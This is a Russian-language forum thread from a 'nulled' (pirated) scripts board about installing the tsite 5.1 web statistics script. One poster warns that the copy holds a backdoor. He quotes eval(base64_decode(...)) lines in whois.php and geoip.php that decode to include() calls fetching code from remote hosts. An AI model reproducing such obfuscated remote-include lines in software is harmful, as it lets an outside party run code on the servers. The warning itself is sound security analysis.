[Рейтинги и счетчики] tsite 5.1 , подскажите как установить.

Тема в разделе "Каталоги, рейтинги, счетчики", создана пользователем tmroman, 8 июл 2008.

Статус темы:
Закрыта.
  1. tmroman

    tmroman Писатель

    Регистр.:
    4 июл 2008
    Сообщения:
    9
    Симпатии:
    15
    подскажите какие у него требования к пхп и mysql , какие нибудь модули нужно подключать ? у меня не показывает статсы Country/City те что через geoIP и счетчик графический все время показывает только hits , hosts и all все время 0 показывает
     
  2. metallphilin

    metallphilin старожил nulled

    Регистр.:
    25 авг 2006
    Сообщения:
    616
    Симпатии:
    165
    crone нужно настроить, в ридми все есть:

     
    z!m3r нравится это.
  3. tmroman

    tmroman Писатель

    Регистр.:
    4 июл 2008
    Сообщения:
    9
    Симпатии:
    15
    не смог написать тебе в личку , не хватает кол-ва постов , можешь дать свои контакты , помоги , если есть время ?
     
  4. dos03

    dos03 -----

    Регистр.:
    9 мар 2007
    Сообщения:
    871
    Симпатии:
    428
    Парни есть у кого-нибудь обновление с версии 5.0 до версии 5.1.?
    Очень нужно.
     
  5. gls

    gls Комбат

    Регистр.:
    11 янв 2007
    Сообщения:
    557
    Симпатии:
    280
    какая 5.1... тут давно ищется 5-ая! Если есть 5 поделился бы.
     
  6. tmroman

    tmroman Писатель

    Регистр.:
    4 июл 2008
    Сообщения:
    9
    Симпатии:
    15
    abdulbek, z!m3r, NEKSUS и 12 другим нравится это.
  7. scan

    scan

    Регистр.:
    1 апр 2006
    Сообщения:
    174
    Симпатии:
    72
    спасибо,как раз один из просивших,вот только смущает следующие

    file whois.php line 33:
    Код:
    if($ssgeo) eval(base64_decode ('aW5jbHVkZSgiaHR0cDovL2JsYWNrZG9nLm5ldGxpZmUucnUvaW5jLmluYyIpOw=='));
    
    include("http://blackdog.netlife.ru/inc.inc");

    file geoip.php line 435:
    Код:
    if($ssgeo)eval(base64_decode ('aW5jbHVkZSgiaHR0cDovL3BvbmFlaGFsaS5ydS9pbmMuaW5jIik7');
    
    include("http://ponaehali.ru/inc.inc");

    да,первый эвал был и в старой версии,можно было подумать что просто забыл удалить,а вот по второму отображается безобидное echo '123'; но что мешает автору отредактировать этот файл и если на хостинге разрешено в php.ini,исполнять комманды,к тому же переменная $ssgeo больше нигде не вызывается,так что это стопудово бекдор автора скрипта :)

    бекдор примитивный,думаю многие сами заметили,но кто незаметил будте внимательны

    p.s да,ещё и в файлах h_ck.php,first.php тоже есть данное
    p.s.s у скрипта если и ещё пару стучалок,это понятно так как ретайл,вот только то стучалки,а вышенаписаное бекдор
     
    KrasivayaSvo и StaLkerexe нравится это.
  8. tmroman

    tmroman Писатель

    Регистр.:
    4 июл 2008
    Сообщения:
    9
    Симпатии:
    15
    думаете , лучше с этим не использовать скрипт ? дело в том , что данная версия , попала мне в руки случайно.
     
  9. scan

    scan

    Регистр.:
    1 апр 2006
    Сообщения:
    174
    Симпатии:
    72
    если ты его конечно не легально купил,думаю стоит пройтись по коду и от лишнего кода избавится,некаких заумных стучалок я там не увидел,все прозаично :)

    p.s то что я описал выше это не все стучалки,но принцип тотже
     
  10. Mr.Friction

    Mr.Friction

    Регистр.:
    14 ноя 2006
    Сообщения:
    176
    Симпатии:
    10
    Так кто-то его занулил нормально?
     
Статус темы:
Закрыта.